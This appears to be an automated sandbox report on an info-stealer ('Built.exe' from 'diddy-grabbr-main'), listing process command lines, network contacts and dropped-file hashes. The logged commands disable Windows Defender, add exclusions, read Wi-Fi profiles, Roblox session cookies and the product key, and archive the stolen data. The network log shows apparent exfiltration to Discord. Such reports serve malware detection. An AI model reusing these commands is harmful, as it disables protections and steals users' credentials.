"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffec77846f8,0x7ffec7784708,0x7ffec7784718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2180,15353215480120177997,1563734136622774177,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2244 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2180,15353215480120177997,1563734136622774177,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2312 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2180,15353215480120177997,1563734136622774177,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2688 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2180,15353215480120177997,1563734136622774177,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3272 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2180,15353215480120177997,1563734136622774177,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3284 /prefetch:1

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2180,15353215480120177997,1563734136622774177,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5436 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2180,15353215480120177997,1563734136622774177,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5436 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2180,15353215480120177997,1563734136622774177,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=5428 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2180,15353215480120177997,1563734136622774177,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5680 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2180,15353215480120177997,1563734136622774177,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5536 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2180,15353215480120177997,1563734136622774177,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5868 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2180,15353215480120177997,1563734136622774177,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5924 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2180,15353215480120177997,1563734136622774177,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6324 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2180,15353215480120177997,1563734136622774177,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6340 /prefetch:1

C:\Windows\System32\rundll32.exe

C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding

C:\Users\Admin\Downloads\diddy-grabbr-main\diddy-grabbr-main\Built.exe

"C:\Users\Admin\Downloads\diddy-grabbr-main\diddy-grabbr-main\Built.exe"

C:\Users\Admin\Downloads\diddy-grabbr-main\diddy-grabbr-main\Built.exe

"C:\Users\Admin\Downloads\diddy-grabbr-main\diddy-grabbr-main\Built.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\Downloads\diddy-grabbr-main\diddy-grabbr-main\Built.exe'"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend

C:\Windows\system32\tasklist.exe

tasklist /FO LIST

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\Downloads\diddy-grabbr-main\diddy-grabbr-main\Built.exe'

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"

C:\Windows\System32\Wbem\WMIC.exe

wmic csproduct get uuid

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"

C:\Windows\system32\reg.exe

REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"

C:\Windows\system32\reg.exe

REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"

C:\Windows\System32\Wbem\WMIC.exe

wmic path win32_VideoController get name

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"

C:\Windows\System32\Wbem\WMIC.exe

wmic path win32_VideoController get name

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\   ‎ .scr'"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"

C:\Windows\system32\tasklist.exe

tasklist /FO LIST

C:\Windows\system32\tasklist.exe

tasklist /FO LIST

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\   ‎ .scr'

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "netsh wlan show profile"

C:\Windows\system32\netsh.exe

netsh wlan show profile

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /PID 4928"

C:\Windows\system32\taskkill.exe

taskkill /F /PID 4928

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /PID 4912"

C:\Windows\system32\taskkill.exe

taskkill /F /PID 4912

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /PID 808"

C:\Windows\system32\taskkill.exe

taskkill /F /PID 808

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /PID 2040"

C:\Windows\system32\taskkill.exe

taskkill /F /PID 2040

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /PID 3160"

C:\Windows\system32\taskkill.exe

taskkill /F /PID 3160

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /PID 2452"

C:\Windows\system32\taskkill.exe

taskkill /F /PID 2452

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /PID 2716"

C:\Windows\system32\taskkill.exe

taskkill /F /PID 2716

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /PID 4844"

C:\Windows\system32\taskkill.exe

taskkill /F /PID 4844

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /PID 5236"

C:\Windows\system32\taskkill.exe

taskkill /F /PID 5236

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /PID 5248"

C:\Windows\system32\taskkill.exe

taskkill /F /PID 5248

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI56722\rar.exe a -r -hp"BANE" "C:\Users\Admin\AppData\Local\Temp\YFIex.zip" *"

C:\Users\Admin\AppData\Local\Temp\_MEI56722\rar.exe

C:\Users\Admin\AppData\Local\Temp\_MEI56722\rar.exe a -r -hp"BANE" "C:\Users\Admin\AppData\Local\Temp\YFIex.zip" *

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "wmic os get Caption"

C:\Windows\System32\Wbem\WMIC.exe

wmic os get Caption

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"

C:\Windows\System32\Wbem\WMIC.exe

wmic computersystem get totalphysicalmemory

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"

C:\Windows\System32\Wbem\WMIC.exe

wmic csproduct get uuid

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"

C:\Windows\System32\Wbem\WMIC.exe

wmic path win32_VideoController get name

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 228.249.119.40.in-addr.arpa udp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 83.210.23.2.in-addr.arpa udp
US 8.8.8.8:53 avatars.githubusercontent.com udp
US 8.8.8.8:53 github.githubassets.com udp
US 185.199.111.133:443 avatars.githubusercontent.com tcp
US 8.8.8.8:53 github-cloud.s3.amazonaws.com udp
US 185.199.110.154:443 github.githubassets.com tcp
US 185.199.110.154:443 github.githubassets.com tcp
US 185.199.110.154:443 github.githubassets.com tcp
US 185.199.110.154:443 github.githubassets.com tcp
US 185.199.110.154:443 github.githubassets.com tcp
US 185.199.110.154:443 github.githubassets.com tcp
US 8.8.8.8:53 user-images.githubusercontent.com udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 154.110.199.185.in-addr.arpa udp
US 8.8.8.8:53 collector.github.com udp
US 185.199.110.154:443 github.githubassets.com tcp
US 140.82.113.22:443 collector.github.com tcp
US 8.8.8.8:53 api.github.com udp
US 140.82.113.22:443 collector.github.com tcp
GB 20.26.156.210:443 api.github.com tcp
US 8.8.8.8:53 22.113.82.140.in-addr.arpa udp
US 8.8.8.8:53 210.156.26.20.in-addr.arpa udp
N/A 224.0.0.251:5353 udp
US 8.8.8.8:53 codeload.github.com udp
GB 20.26.156.216:443 codeload.github.com tcp
US 8.8.8.8:53 216.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 104.219.191.52.in-addr.arpa udp
US 8.8.8.8:53 blank-vqqbh.in udp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 gstatic.com udp
GB 142.250.200.35:443 gstatic.com tcp
US 8.8.8.8:53 1.112.95.208.in-addr.arpa udp
US 8.8.8.8:53 200.163.202.172.in-addr.arpa udp
US 8.8.8.8:53 171.39.242.20.in-addr.arpa udp
US 8.8.8.8:53 65.139.73.23.in-addr.arpa udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 discord.com udp
US 162.159.138.232:443 discord.com tcp
US 8.8.8.8:53 232.138.159.162.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 c2d9eeb3fdd75834f0ac3f9767de8d6f
SHA1 4d16a7e82190f8490a00008bd53d85fb92e379b0
SHA256 1e5efb5f1d78a4cc269cb116307e9d767fc5ad8a18e6cf95c81c61d7b1da5c66
SHA512 d92f995f9e096ecc0a7b8b4aca336aeef0e7b919fe7fe008169f0b87da84d018971ba5728141557d42a0fc562a25191bd85e0d7354c401b09e8b62cdc44b6dcd

\??\pipe\LOCAL\crashpad_4928_HJFXPHIQDFTSXJPN

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 e55832d7cd7e868a2c087c4c73678018
SHA1 ed7a2f6d6437e907218ffba9128802eaf414a0eb
SHA256 a4d7777b980ec53de3a70aca8fb25b77e9b53187e7d2f0fa1a729ee9a35da574
SHA512 897fdebf1a9269a1bf1e3a791f6ee9ab7c24c9d75eeff65ac9599764e1c8585784e1837ba5321d90af0b004af121b2206081a6fb1b1ad571a0051ee33d3f5c5f

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 f88d095505605195c96b6e678b05b3fb
SHA1 0cf76fb99abbbce9262c4f15e6446db6c6a7acba
SHA256 0e8c11fdc7887aec5a3b01ccfd4d9b51b7f4f782eba48c2caf3f9fc6a23c8db7
SHA512 3e7604f64c66b5159e0155016562978521e20943f306ccdd438b646f4fa71f80a734313e94b7a5b18f014231eaed3a80b6f72918e33b433a311a67fa06748140

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

MD5 206702161f94c5cd39fadd03f4014d98
SHA1 bd8bfc144fb5326d21bd1531523d9fb50e1b600a
SHA256 1005a525006f148c86efcbfb36c6eac091b311532448010f70f7de9a68007167
SHA512 0af09f26941b11991c750d1a2b525c39a8970900e98cba96fd1b55dbf93fee79e18b8aab258f48b4f7bda40d059629bc7770d84371235cdb1352a4f17f80e145

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

MD5 46295cac801e5d4857d09837238a6394
SHA1 44e0fa1b517dbf802b18faf0785eeea6ac51594b
SHA256 0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443
SHA512 8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23

C:\Users\Admin\Downloads\Unconfirmed 468623.crdownload

MD5 2d4f21bab4a9a2ffe8959c83aa3645cd
SHA1 0ec14b8424a89e0ff26cbe8acd072a36efe53d66
SHA256 aa341244f61e919a3cbf0fa408294d6ba70896daefb73c59942a9c7540c39c62
SHA512 f56f7730f485ba2722465e6be20ba6bac7222f94167530ff6b026efab8346ecb3303cc17c21ea1c1cfe5d54108219ccc414d7ac40eef35c8aa9ff1cbb685d57a

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 c821f5c2d28828486b893d5748fc140b
SHA1 4b7c3c3382732a1032a8a9f296e5c74daac7cb06
SHA256 bd8e2ee70163297abcba574d908c4add9c9036649f0e9da54a9cf9fa65fa9667
SHA512 954c04d848ef6ebcdc256dfa64f334583132f30449eed164193c3f560df39ae3117fd418a027938fd4defe1a2d509e41387629be04e96aa6de81251ca5b33300

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 93760fde380c27528c2324902b9aef11
SHA1 a8163f831e322b13ca2dd54d09bc219644122f68
SHA256 96ffca7ced3b955fe2e3dae8bbe5bf93d099ef6221cf967df67520b09f6a11f7
SHA512 d563efc324b1f1412305206068fb66dcd199fb50a8e1fbfbe32cb9175799dbc5975d3a244938fee6c6d1b9cd2d87edcc5173e0cef88ea5dffbad8606a8274169

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 fefcf92c62809169fdf2142f1d156eb6
SHA1 2024d4b1f222d99ebef8a64b621f7ffb06c7092e
SHA256 1ec9b38bc3a3f9aaba980a4b9fe77bf9ea50662b4279dcea997d344040d376d3
SHA512 0fcffe194c7b92b688648837ffc8ef9ea4226edef7a032a219b151822c372e750db8f822dce8581e2dc64d6eeab935dfe841eb916412c02b29eb3aa14fc035c4

C:\Users\Admin\AppData\Local\Temp\_MEI56722\python312.dll

MD5 2996cbf9598eb07a64d66d4c3aba4b10
SHA1 ac176ab53cdef472770d27a38db5bd6eb71a5627
SHA256 feba57a74856dedb9d9734d12c640ca7f808ead2db1e76a0f2bcf1e4561cd03f
SHA512 667e117683d94ae13e15168c477800f1cd8d840e316890ec6f41a6e4cefd608536655f3f6d7065c51c6b1b8e60dd19aa44da3f9e8a70b94161fd7dc3abf5726c

C:\Users\Admin\AppData\Local\Temp\_MEI56722\VCRUNTIME140.dll

MD5 862f820c3251e4ca6fc0ac00e4092239
SHA1 ef96d84b253041b090c243594f90938e9a487a9a
SHA256 36585912e5eaf83ba9fea0631534f690ccdc2d7ba91537166fe53e56c221e153
SHA512 2f8a0f11bccc3a8cb99637deeda0158240df0885a230f38bb7f21257c659f05646c6b61e993f87e0877f6ba06b347ddd1fc45d5c44bc4e309ef75ed882b82e4e

memory/5856-237-0x00007FFEC1760000-0x00007FFEC1E22000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\_MEI56722\base_library.zip

MD5 bed03063e08a571088685625544ce144
SHA1 56519a1b60314ec43f3af0c5268ecc4647239ba3
SHA256 0d960743dbf746817b61ff7dd1c8c99b4f8c915de26946be56118cd6bedaebdc
SHA512 c136e16db86f94b007db42a9bf485a7c255dcc2843b40337e8f22a67028117f5bd5d48f7c1034d7446bb45ea16e530f1216d22740ddb7fab5b39cc33d4c6d995

C:\Users\Admin\AppData\Local\Temp\_MEI56722\_ctypes.pyd

MD5 2401460a376c597edce907f31ec67fbc
SHA1 7f723e755cb9bfeac79e3b49215dd41fdb5c2d90
SHA256 4f3f99b69834c43dac5c3f309cb0bd56c07e8c2ac555de4923fa2ddc27801960
SHA512 9e77d666c6b74cfb6287775333456cce43feb51ec39ad869c3350b1308e01ad9b9c476c8fa6251fe8ad4ab1175994902a4ad670493b95eb52adb3d4606c0b633

C:\Users\Admin\AppData\Local\Temp\_MEI56722\libffi-8.dll

MD5 08b000c3d990bc018fcb91a1e175e06e
SHA1 bd0ce09bb3414d11c91316113c2becfff0862d0d
SHA256 135c772b42ba6353757a4d076ce03dbf792456143b42d25a62066da46144fece
SHA512 8820d297aeda5a5ebe1306e7664f7a95421751db60d71dc20da251bcdfdc73f3fd0b22546bd62e62d7aa44dfe702e4032fe78802fb16ee6c2583d65abc891cbf

memory/5856-243-0x00007FFED61F0000-0x00007FFED6215000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\_MEI56722\_ssl.pyd

MD5 68e9eb3026fa037ee702016b7eb29e1b
SHA1 60c39dec3f9fb84b5255887a1d7610a245e8562e
SHA256 2ae5c1bdd1e691675bb028efd5185a4fa517ac46c9ef76af23c96344455ecc79
SHA512 50a919a9e728350005e83d5dd51ebca537afe5eb4739fee1f6a44a9309b137bb1f48581bafa490b2139cf6f035d80379bf6ffcdff7f4f1a1de930ba3f508c1af

C:\Users\Admin\AppData\Local\Temp\_MEI56722\_sqlite3.pyd

MD5 3911ae916c6e4bf99fe3296c3e5828ca
SHA1 87165cbf8ea18b94216ac2d1ffe46f22eddb0434
SHA256 3ec855c00585db0246b56f04d11615304931e03066cb9fc760ed598c34d85a1f
SHA512 5c30ed540fdfa199cdf56e73c9a13e9ac098f47244b076c70056fd4bf46f5b059cb4b9cdb0e03568ca9c93721622c793d6c659704af400bd3e20767d1893827e

C:\Users\Admin\AppData\Local\Temp\_MEI56722\_socket.pyd

MD5 1d982f4d97ee5e5d4d89fe94b7841a43
SHA1 7f92fe214183a5c2a8979154ece86aad3c8120c6
SHA256 368cf569adc4b8d2c981274f22181fea6e7ce4fa09b3a5d883b0ff0ba825049d
SHA512 9ecdcf9b3e8dc7999d2fa8b3e3189f4b59ae3a088c4b92eaa79385ed412f3379ebe2f30245a95d158051dbd708a5c9941c150b9c3b480be7e1c2bba6dea5cb24

C:\Users\Admin\AppData\Local\Temp\_MEI56722\_queue.pyd

MD5 84aa87c6dd11a474be70149614976b89
SHA1 c31f98ec19fc36713d1d7d077ad4176db351f370
SHA256 6066df940d183cf218a5053100e474d1f96be0a4e4ee7c09b31ea303ff56e21b
SHA512 11b9f8e39c14c17788cc8f1fddd458d70b5f9ef50a3bdb0966548ddcb077ff1bf8ca338b02e45ec0b2e97a5edbe39481dd0e734119bc1708def559a0508adc42

C:\Users\Admin\AppData\Local\Temp\_MEI56722\_lzma.pyd

MD5 e0fa126b354b796f9735e07e306573e1
SHA1 18901ce5f9a1f6b158f27c4a3e31e183aa83251b
SHA256 e0dc01233b16318cd21ca13570b8fdf4808657ec7d0cc3e7656b09ccf563dc3e
SHA512 dd38100889c55bffc6c4b882658ecd68a79257bc1ffd10f0f46e13e79bff3fc0f908ae885cc4a5fed035bd399860b923c90ef75e203b076b14069bf87610f138

C:\Users\Admin\AppData\Local\Temp\_MEI56722\_hashlib.pyd

MD5 d4c05f1c17ac3eb482b3d86399c9baae
SHA1 81b9a3dd8a5078c7696c90fbd4cf7e3762f479a5
SHA256 86bd72b13a47693e605a0de1112c9998d12e737644e7a101ac396d402e25cf2f
SHA512 f81379d81361365c63d45d56534c042d32ee52cad2c25607794fe90057dcdeeb2b3c1ff1d2162f9c1bdf72871f4da56e7c942b1c1ad829c89bf532fb3b04242e

C:\Users\Admin\AppData\Local\Temp\_MEI56722\_decimal.pyd

MD5 df361ea0c714b1a9d8cf9fcf6a907065
SHA1 102115ec2e550a8a8cad5949530cca9993250c76
SHA256 f78ee4524eb6e9885b9cbdb125b2f335864f51e9c36dc18fdccb5050926adffe
SHA512 b1259df9167f89f8df82bda1a21a26ee7eb4824b97791e7bbaa3e57b50ae60676762fd598c8576d4e6330ffaf12972a31db2f17b244c5301dcf29fe4abfba43f

C:\Users\Admin\AppData\Local\Temp\_MEI56722\_bz2.pyd

MD5 1d9398c54c80c0ef2f00a67fc7c9a401
SHA1 858880173905e571c81a4a62a398923483f98e70
SHA256 89006952bee2b38d1b5c54cc055d8868d06c43e94cd9d9e0d00a716c5f3856fa
SHA512 806300d5820206e8f80639ccb1fba685aafa66a9528416102aeb28421e77784939285a88a67fad01b818f817a91382145322f993d855211f10e7ba3f5563a596

C:\Users\Admin\AppData\Local\Temp\_MEI56722\unicodedata.pyd

MD5 382cd9ff41cc49ddc867b5ff23ef4947
SHA1 7e8ef1e8eaae696aea56e53b2fb073d329ccd9d6
SHA256 8915462bc034088db6fdb32a9b3e3fcfe5343d64649499f66ffb8ada4d0ad5f2
SHA512 4e911b5fb8d460bfe5cb09eab74f67c0f4b5f23a693d1ff442379f49a97da8fed65067eb80a8dbeedb6feebc45f0e3b03958bd920d582ffb18c13c1f8c7b4fc4

C:\Users\Admin\AppData\Local\Temp\_MEI56722\sqlite3.dll

MD5 19efdd227ee57e5181fa7ceb08a42aa1
SHA1 5737adf3a6b5d2b54cc1bace4fc65c4a5aafde50
SHA256 8a77b2c76440365ee3e6e2f589a78ad53f2086b1451b5baa0c4bfe3b6ee1c49d
SHA512 77db2fe6433e6a80042a091f86689186b877e28039a6aeaa8b2b7d67c8056372d04a1a8afdb9fe92cfaea30680e8afeb6b597d2ecf2d97e5d3b693605b392997

C:\Users\Admin\AppData\Local\Temp\_MEI56722\select.pyd

MD5 0433850f6f3ddd30a85efc839fbdb124
